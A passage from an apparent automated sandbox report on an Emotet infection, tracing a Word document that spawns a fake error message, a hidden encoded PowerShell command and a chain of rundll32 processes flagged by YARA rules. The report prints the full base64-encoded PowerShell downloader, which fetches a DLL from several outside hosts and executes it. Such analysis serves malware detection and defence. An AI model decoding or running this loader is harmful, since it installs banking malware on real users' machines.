KQAuACIAUwBgAFAAbABpAFQAIgAoACQAQgBpAHkANwB2AGYAegAgACsAIAAkAFMAbABmAHIAMQBnAHAAIAArACAAJABaADcAdgB1AGwAYwB2ACkAOwAkAEQAbQBxAGkAOABwAGkAPQAoACcAUAAnACsAKAAnAGoAZAB1ACcAKwAnAGQAYwA5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABaAHAANQBrAG4AcgB5ACAAaQBuACAAJABKAGsAZAB5AHMAMABvACAAfAAgAFMAYABPAFIAdAAtAGAAbwBCAEoAYABFAGAAQwB0ACAAewBnAGAARQBUAC0AcgBgAEEAbgBgAEQATwBtAH0AKQB7AHQAcgB5AHsAJABHAGsAaABtADEAdABnAC4AIgBEAE8AdwBuAGwAbwBgAEEAYABEAGYASQBMAEUAIgAoACQAWgBwADUAawBuAHIAeQAsACAAJABKAGQAZwB6AGEANQBvACkAOwAkAFoAZABjAGoAMABjAG4APQAoACcASAAnACsAKAAnADMAJwArACcAcQAwADkAawAnACkAKwAnAHEAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEoAZABnAHoAYQA1AG8AKQAuACIATABgAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMAOQA4ADgANwApACAAewAmACgAJwByACcAKwAnAHUAbgAnACsAJwBkAGwAbAAzADIAJwApACAAJABKAGQAZwB6AGEANQBvACwAJwAjADEAJwAuACIAVABPAHMAYABUAGAAUgBpAG4ARwAiACgAKQA7ACQASABhAG8AMAA4ADYAeQA9ACgAJwBPAGsAJwArACcAbQBiACcAKwAoACcAZQAwACcAKwAnADgAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAdgBpAF8AbQB0AGIAPQAoACgAJwBCADAAJwArACcAZgAwACcAKQArACcAawBnACcAKwAnAG0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAGYANABjAHQAeQBjAD0AKAAoACcASwAnACsAJwBqAG8AJwApACsAJwA0ACcAKwAoACcAYgBtACcAKwAnAGcAJwApACkA
                                            Imagebase:0x4a860000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: msg.exe PID: 2408 Parent PID: 2492

                                            General

                                            Start time:13:42:36
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xffbd0000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: powershell.exe PID: 2312 Parent PID: 2492

                                            General

                                            Start time:13:42:37
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoASgAnACkAKwAoACgAJwApACcAKwAnACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgAnACkAKQArACgAKAAnACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACkAKQArACcAdwAnACsAJwB3ACcAKwAnAHcAJwArACgAJwAuAGcAcgBlACcAKwAnAGEAJwApACsAJwB1ACcAKwAoACcAZABzACcAKwAnAHQAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAJwArACcAKAAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKABkACcAKwAnAG8AJwArACcAYwBzACcAKQApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAnACkAKQArACgAKAAnACgARgBHAG4ASgAnACsAJwApACcAKwAnACgAJwArACcAMwAnACsAJwBzADIAKQAoAEAAaAB0AHQAcAA6AEoAKQAoACcAKQApACsAJwAzACcAKwAnAHMAJwArACgAKAAnADIAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGsAJwArACcAbwAnACkAKQArACcAcgAnACsAKAAnAGUAYQAnACsAJwBuAGsAJwArACcAaQBkACcAKQArACgAJwBzACcAKwAnAGUAZAAnACkAKwAoACcAdQAuAGMAJwArACcAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAoACcAKwAnAHcAcAAtAGMAbwAnACsAJwBuACcAKQApACsAKAAnAHQAZQBuACcAKwAnAHQAJwApACsAKAAoACcASgApACcAKQApACsAKAAoACcAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAMgBjACcAKwAnAFEAJwApACsAKAAoACcAVABoAEoAJwArACcAKQAnACkAKQArACgAKAAnACgAMwAnACsAJwBzACcAKQApACsAKAAoACcAMgApACcAKwAnACgAQABoAHQAJwArACcAdAAnACsAJwBwADoASgApACgAJwArACcAMwBzADIAKQAoAEoAJwArACcAKQAnACsAJwAoACcAKQApACsAKAAnADMAcwAnACsAJwAyACcAKQArACcAKQAnACsAJwAoACcAKwAoACcAZQB4AHAAJwArACcAZQBkAGkAJwApACsAJwB0AGkAJwArACcAbwAnACsAKAAnAG4AcQAnACsAJwB1AGUAJwApACsAJwBzAHQAJwArACcALgBjACcAKwAnAG8AJwArACcAbQBKACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgAnACsAJwApACgAWABKACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAB0AHQAcAAnACsAJwBzADoASgAnACkAKQArACcAKQAnACsAJwAoACcAKwAoACgAJwAzAHMAJwArACcAMgApACcAKwAnACgASgAnACsAJwApACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAJwApACkAKwAoACcAcwB1ACcAKwAnAHIAJwApACsAJwBpACcAKwAoACcAYQBnAHIAJwArACcAbwAnACkAKwAoACcAZgAnACsAJwByAGUAcwAnACsAJwBoAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAKAAnAEoAKQAoADMAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoAHMAZQAnACsAJwByAGUAJwApACkAKwAoACgAJwB2AGUAcgBzAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAE0AJwApACkAKwAnAFYARAAnACsAJwBqACcAKwAoACgAJwBJAEoAKQAoADMAcwAyACcAKwAnACkAKAAnACsAJwBAACcAKQApACsAKAAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAEoAKQAoADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAnACsAJwAoAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGcAJwArACcAZQAnACsAJwBvAGYAJwApACkAKwAoACcAZgAnACsAJwBvAGcAJwApACsAJwBsAGUAJwArACgAJwBtAHUAcwAnACsAJwBpAGMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACkAJwArACcAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwArACcAdwBwAC0AYQAnACsAJwBkACcAKQApACsAKAAoACcAbQBpACcAKwAnAG4AJwArACcASgApACgAJwApACkAKwAoACgAJwAzAHMAMgApACgAeAAnACsAJwBKACkAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwApACkAKwAnAEAAJwArACgAJwBoACcAKwAnAHQAdABwACcAKQArACgAKAAnAHMAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKABKACcAKQApACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzACcAKwAnADIAKQAoACcAKQApACsAKAAnAGQAJwArACcAYQBnACcAKQArACgAJwByACcAKwAnAGEAbgBpACcAKQArACcAdAAnACsAKAAnAGUAZwBpAGEAcgBlACcAKwAnAC4AYwBvACcAKwAnAG0ASgAnACkAKwAnACkAJwArACgAJwAoADMAcwAyACcAKwAnACkAJwApACsAJwAoACcAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtAGkAbgAnACkAKwAoACgAJwBKACcAKwAnACkAKAAnACkAKQArACcAMwAnACsAJwBzACcAKwAnADIAJwArACgAKAAnACkAJwArACcAKABqAEMASABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQApACkALgAiAFIAZQBQAGwAYQBgAEMAZQAiACgAKAAoACgAKAAnAEoAKQAoADMAJwArACcAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQAQgBpAHkANwB2AGYAegAgACsAIAAkAFMAbABmAHIAMQBnAHAAIAArACAAJABaADcAdgB1AGwAYwB2ACkAOwAkAEQAbQBxAGkAOABwAGkAPQAoACcAUAAnACsAKAAnAGoAZAB1ACcAKwAnAGQAYwA5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABaAHAANQBrAG4AcgB5ACAAaQBuACAAJABKAGsAZAB5AHMAMABvACAAfAAgAFMAYABPAFIAdAAtAGAAbwBCAEoAYABFAGAAQwB0ACAAewBnAGAARQBUAC0AcgBgAEEAbgBgAEQATwBtAH0AKQB7AHQAcgB5AHsAJABHAGsAaABtADEAdABnAC4AIgBEAE8AdwBuAGwAbwBgAEEAYABEAGYASQBMAEUAIgAoACQAWgBwADUAawBuAHIAeQAsACAAJABKAGQAZwB6AGEANQBvACkAOwAkAFoAZABjAGoAMABjAG4APQAoACcASAAnACsAKAAnADMAJwArACcAcQAwADkAawAnACkAKwAnAHEAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEoAZABnAHoAYQA1AG8AKQAuACIATABgAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMAOQA4ADgANwApACAAewAmACgAJwByACcAKwAnAHUAbgAnACsAJwBkAGwAbAAzADIAJwApACAAJABKAGQAZwB6AGEANQBvACwAJwAjADEAJwAuACIAVABPAHMAYABUAGAAUgBpAG4ARwAiACgAKQA7ACQASABhAG8AMAA4ADYAeQA9ACgAJwBPAGsAJwArACcAbQBiACcAKwAoACcAZQAwACcAKwAnADgAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAdgBpAF8AbQB0AGIAPQAoACgAJwBCADAAJwArACcAZgAwACcAKQArACcAawBnACcAKwAnAG0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAGYANABjAHQAeQBjAD0AKAAoACcASwAnACsAJwBqAG8AJwApACsAJwA0ACcAKwAoACcAYgBtACcAKwAnAGcAJwApACkA
                                            Imagebase:0x13f970000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2095373309.0000000000106000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2095728605.0000000001F14000.00000004.00000040.sdmp, Author: Florian Roth
                                            Reputation:high

                                            Analysis Process: rundll32.exe PID: 2832 Parent PID: 2312

                                            General

                                            Start time:13:42:44
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                                            Imagebase:0xff110000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2744 Parent PID: 2832

                                            General

                                            Start time:13:42:44
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2096970876.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2096914563.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 912 Parent PID: 2744

                                            General

                                            Start time:13:42:45
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2098614058.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2098670665.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 260 Parent PID: 912

                                            General

                                            Start time:13:42:45
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2099926310.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2099888213.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2480 Parent PID: 260

                                            General

                                            Start time:13:42:46
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2101765881.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2102126340.00000000003A1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2448 Parent PID: 2480

                                            General

                                            Start time:13:42:47
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2104432048.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2104402194.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2804 Parent PID: 2448

                                            General

                                            Start time:13:42:48
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106262075.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106324425.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2956 Parent PID: 2804

                                            General

                                            Start time:13:42:49
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107396520.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107481721.0000000000271000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2264 Parent PID: 2956

                                            General

                                            Start time:13:42:50
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109063945.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109311078.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2240 Parent PID: 2264

                                            General

                                            Start time:13:42:50
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110398368.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110449108.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2412 Parent PID: 2240

                                            General

                                            Start time:13:42:51
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2111825774.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2111379658.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 600 Parent PID: 2412

                                            General

                                            Start time:13:42:52
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2112781358.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2113001666.0000000000231000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 2432 Parent PID: 600

                                            General

                                            Start time:13:42:52
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114509777.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114590514.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 552 Parent PID: 2432

                                            General

                                            Start time:13:42:53
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2115599459.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2115515890.0000000000140000.00000040.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 1840 Parent PID: 552

                                            General

                                            Start time:13:42:53
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
